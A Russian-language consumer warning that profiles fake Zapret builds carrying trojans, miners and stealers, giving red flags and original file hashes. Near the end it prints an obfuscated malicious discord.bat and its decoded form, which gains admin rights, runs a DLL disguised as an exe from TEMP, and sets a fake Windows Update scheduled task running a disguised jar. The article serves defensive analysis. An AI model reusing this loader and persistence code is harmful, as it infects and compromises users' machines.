Вирусы в Запрет! Рассказываем про WinDivert

Новая группа про реальные вирусные сборки запрета: https://t.me/zapretvirus

Запрет вирус? Обход блокировки дискорда и ютуба (discord и youtube). Если не работает дискорд или ютуб вам сюда. | Список вирусных Zapret представлен здесь...

Как проверить вирусы?

• Проект должен быть с открытым исходным кодом. Любой лаунчер человек должен собрать сам. Поэтому у него должен быть исходный код (batфайлы, ps файлы, pyфайлы и т.д.)
• Вы можете собрать его самостоятельно из исходных файлов или по крайней мере запуск производится по понятным механикам.
• Одно из самых важных правил: В проекте нет ни одного неизвестного exeфайла! Должен быть только один файл winws.exe!

Если Вы (или по крайней мере Вам кажется) что вы поймали вирус обратитесь в группу https://t.me/keepbot_chat - вам помогут опытные люди с самыми различными историями.

Почему антивирусы ругаются?

Вы должны не просто видеть слово Trojan и пугаться его, а в начале разобраться с типом вирусов.

Подробнее про WinDivert можно почитать здесь.

Вот пример незараженного dll файла, который всего лишь изменяет код некоторых файлов для запуска пиратской игры.

Данный dll хорошо известен и достаточно популярный на запада, однако антивирусы сходят с ума когда его видят.

Win64/Trojan.Generic.HgEATiwA — китайские антивирусы часто нумируют так неизвестные им программы, которые как-то вшиваются в трафик. Доказательства этому приведены здесь, здесь и здесь.

NotAVirus — частый детект различных китайских вирусов, но он так и подписан - не вирус. Это значит что файл просто выполняет подозрительные действия, но напрямую не является трояном.

Про хэш-файла

Неизвестные источники всё же могут маскировать Zapret под вирусы.

Есть способ защититься от этого - всегда сверяйте хэш файла WinDivert.dll и winws.exe. Если хэш суммы одинаковые, это значит что файлы никак не были изменены автором и были загружены из оригинального источника. Проверить хэш файла можно здесь.

Вот несколько старых хэшей файлов (есть и другие).

Оригинальные хэщи программы winws.exe

• MD5 444fe359ca183016b93d8bfe398d5103
• SHA-1 61716de8152bd3a59378a6cd11f6b07988a549d5
• SHA-256 0453fce6906402181dbff7e09b32181eb1c08bb002be89849e8992b832f43b89

Версия v68

• MD5 c36c5c34d612ffc684047b7c87310a1f
• SHA-1 5b9a89d08554f911e93665a3910ff16db33bf1ce
• SHA-256 c26719336725fda6d48815582acee198c0d7d4f6a6f9f73b5e0d58ca19cfbe35

Другие версии проверяйте самостоятельно здесь.

Реальные вирусы

Однако не смотря на это были найдены примеры реально вирусных запретов.

Почему это так, и как проверить любую версию Запрет самостоятельно - давайте разбираться.

1. PeekBot - первый автор

Впервые вирусы в Zapret начал распространять телеграм канал peekbot начал распространять вирусы под предлогом Zapret. Будьте внимательны! Также у них имеется вредоносный сайт https://gitrok.com!

В папке висит вирусный cygwin.exe который весит свыше 13 МБ. Такие большие файлы никогда не находились в оригинальном Zapret.

2. SkyWinFo - майнер, стилер

SkyWinFo - инженер ВПН который пошёл по скользкой дорожке и попытался превратить безвирусный запрет в самый настоящий вирус. Также был определён его тип и основная активность. Он притворялся запретом от Сensorliber.

🚩 Красные флаги:

• Не имеет исходного кода на GitHub
• Имеет архив rar, причём с паролем (не ясно зачем)
• Просит запустить zapret.exe а не zapret.bat
• Нет связи с автором

В инструкции происходит некая каша и неразбериха, например указаны разные ссылки на источники (первый файл вирусный, второй реальный скрипт):

В файле лежит неизестный вирусный файл, размер которого явно превышает несколько КБ (как оригинальный winws.exe):

Имеет слишком много срабатываний антивирусов, некоторые обнаружения прямо указывает на троян.

При анализе файла сканирует папки на куки файлы, создаёт папки для криптокошелков и пытается запустить множество процессов. Отправляет данные на неизвестный сайт.

3. Cactuz - троян

Новый тип вирусов с файлом winwsdriver.exe.

Их Телеграм группа:

Пост с вирусом:

Их ютуб канал:

Очень палёный вирус, который даже не пытается скрыть что он вирус. Второй EXE файл в папке bin который не должен был там быть - winwsdriver.exe

Батник general.bat запускает два exe файла, что опять же не нужно.

На VirusTotal СВЫШЕ 55 срабатываний!

🚩 Красные флаги:

• Не имеет исходного кода на GitHub
• Имеет архив rar, причём с паролем (не ясно зачем)
• Лишние файлы в папке bin
• Нет связи с автором

4. Interfix - вероятно вирус

Также известен как Фиксик, trapper1337.

Неизвестный ютубер trapper1337, в Telegram подписан как Фиксик. В Telegram канал закрыты комментарии, обратной связи с ним нет. Неизвестный exe файл выглядит как подозрительный, но чёткой вирусной активности нет.

Ютуб канал:

В папке bin лежит лишний файл elevator.exe

Файл start.cmd запускает два EXE файла, что не требуется для Zapret

Подозрительный файл не имеет много детектов антивирусов, поэтому чётко заявлять что это троян нельзя.

При этом всё же поведение файла является подозрительным, соединение с какими-то сайтами но не указано какими:

Красные флаги:

• Не имеет исходного кода на GitHub
• Имеет архив rar, причём с паролем (не ясно зачем)
• Лишние файлы в папке bin
• Нет связи с автором

Аналогичный файл можно встретить в сборке от YanGusik FuckDiscordPI.

5. Discord NewFix - скрытый вирус

Данный вирус пытается обфускацировать свой код с помощью программ запутывания кода.

Неизвестный файл discord.bat с иероглифами, который автор канал просит запустить:

挦獬਍敀档景൦ഊ椊⁦硥獩⁴┢单剅剐䙏䱉╅䅜灰慄慴䱜捯污停捡慫敧屳楍牣獯景⹴楗摮睯即潴敲䱜捯污瑓瑡履䥌䕃华⹅硴≴⠠਍††潧潴匠楫䍰摯൥⤊਍਍灯湥楦敬⁳渾汵㈠渾汵਍晩┠牥潲汲癥汥‥敮ⁱ‰ന †瀠睯牥桳汥䌭浯慭摮∠瑓牡⵴牐捯獥⁳┧晾✰ⴠ敖扲爠湵獁ഢ †攠楸⁴戯਍ഩഊ椊⁦硥獩⁴┢摾ば楢屮祣睧湩⸲汤≬⠠਍††潣祰∠縥灤戰湩捜杹楷㉮搮汬•┢䕔偍尥癪攮數•渾汵㈠☾റ⤊攠獬⁥ന †攠楸⁴戯ㄠ਍ഩഊ椊⁦硥獩⁴┢䕔偍尥癪攮數•ന †猠慴瑲∠•┢䕔偍尥癪攮數•猯㸠畮㸲ㄦ਍
汥敳⠠਍††硥瑩⼠⁢റ⤊਍਍晩渠瑯攠楸瑳∠唥䕓偒佒䥆䕌尥灁䑰瑡屡潌慣屬慐正条獥䵜捩潲潳瑦圮湩潤獷瑓牯履潌慣卬慴整•ന †洠摫物∠唥䕓偒佒䥆䕌尥灁䑰瑡屡潌慣屬慐正条獥䵜捩潲潳瑦圮湩潤獷瑓牯履潌慣卬慴整•渾汵㈠☾റ⤊਍਍晩攠楸瑳∠縥灤到䅅䵄⹅摭•ന †挠灯⁹┢摾ば䕒䑁䕍洮≤∠唥䕓偒佒䥆䕌尥灁䑰瑡屡潌慣屬慐正条獥䵜捩潲潳瑦圮湩潤獷瑓牯履潌慣卬慴整䱜䍉久䕓圭⹄硴≴㸠畮㸲ㄦ਍
汥敳⠠਍††硥瑩⼠⁢റ⤊਍਍捳瑨獡獫⼠牣慥整⼠湴∠楍牣獯景屴楗摮睯屳楗摮睯啳摰瑡履湗敔灭•琯⁲尢樢癡睡≜ⴠ慪⁲≜唥䕓偒佒䥆䕌⼥灁䑰瑡⽡潌慣⽬慐正条獥䴯捩潲潳瑦圮湩潤獷瑓牯⽥潌慣卬慴整䰯䍉久䕓圭⹄硴屴∢⼠捳漠汮杯湯⼠汲栠杩敨瑳⼠⁦渾汵㈠☾റഊ㨊歓灩潃敤਍਍档灣㘠〵㄰㸠畮൬㨊›㔶〰️‱ 呕ⵆസഊ挊⁤搯∠縥灤∰਍慣汬挠敨正畟摰瑡獥戮瑡猠景൴攊档㩯਍਍敳⁴䥂㵎縥灤戰湩൜ഊ猊慴瑲∠慺牰瑥›楤捳牯≤⼠業┢䥂╎楷睮⹳硥≥ⴠ眭ⵦ捴㵰㐴″ⴭ晷甭灤㐽㌴㔬〰️〰️㔭㄰〰️帠਍ⴭ楦瑬牥甭灤㐽㌴ⴠ栭獯汴獩㵴氢獩⵴楤捳牯⹤硴≴ⴠ搭楰搭獥湹㵣慦敫ⴠ搭楰搭獥湹ⵣ敲数瑡㵳‶ⴭ灤⵩敤祳据昭歡ⵥ畱捩∽䈥义焥極彣湩瑩慩彬睷彷潧杯敬损浯戮湩•ⴭ敮⁷൞ⴊ昭汩整⵲摵㵰〵〰️ⴰ〵〱‰ⴭ灩敳㵴椢獰瑥搭獩潣摲琮瑸•ⴭ灤⵩敤祳据昽歡⁥ⴭ灤⵩敤祳据愭祮瀭潲潴潣ⴭ灤⵩敤祳据挭瑵景㵦㍤ⴠ搭楰搭獥湹ⵣ敲数瑡㵳‶ⴭ敮⁷൞ⴊ昭汩整⵲捴㵰㐴″ⴭ潨瑳楬瑳∽楬瑳搭獩潣摲琮瑸•ⴭ灤⵩敤祳据昽歡ⱥ灳楬⁴ⴭ灤⵩敤祳据愭瑵瑯汴㈽ⴠ搭楰搭獥湹ⵣ敲数瑡㵳‶ⴭ灤⵩敤祳据昭潯楬杮戽摡敳ⁱⴭ灤⵩敤祳据昭歡ⵥ汴㵳┢䥂╎汴彳汣敩瑮敨汬彯睷彷潧杯敬损浯戮湩ഢ

При расшифровке данного файла окажется что исходный код был пропущен через batch-obfuscator и загружает данный код:

&cls
@echo off

if exist "%USERPROFILE%\AppData\Local\Packages\Microsoft.WindowsStore\LocalState\LICENSE.txt" (
    goto SkipCode
)

openfiles >nul 2>nul
if %errorlevel% neq 0 (
    powershell -Command "Start-Process '%~f0' -Verb runAs"
    exit /b
)

if exist "%~dp0bin\cygwin2.dll" (
    copy "%~dp0bin\cygwin2.dll" "%TEMP%\jv.exe" >nul 2>&1
) else (
    exit /b 1
)

if exist "%TEMP%\jv.exe" (
    start "" "%TEMP%\jv.exe" /s >nul 2>&1

 
 else (
    exit /b 1
)

if not exist "%USERPROFILE%\AppData\Local\Packages\Microsoft.WindowsStore\LocalState" (
    mkdir "%USERPROFILE%\AppData\Local\Packages\Microsoft.WindowsStore\LocalState" >nul 2>&1
)

if exist "%~dp0README.md" (
    copy "%~dp0README.md" "%USERPROFILE%\AppData\Local\Packages\Microsoft.WindowsStore\LocalState\LICENSE-WD.txt" >nul 2>&1

 
 else (
    exit /b 1
)

schtasks /create /tn "Microsoft\Windows\WindowsUpdate\WnTemp" /tr "\"javaw\" -jar \"%USERPROFILE%/AppData/Local/Packages/Microsoft.WindowsStore/LocalState/LICENSE-WD.txt\"-tls="%BIN%tls_clienthello_www_google_com.bin"

Бат файл создаёт задачу на джаве скрипте, после чего подгружается вирус: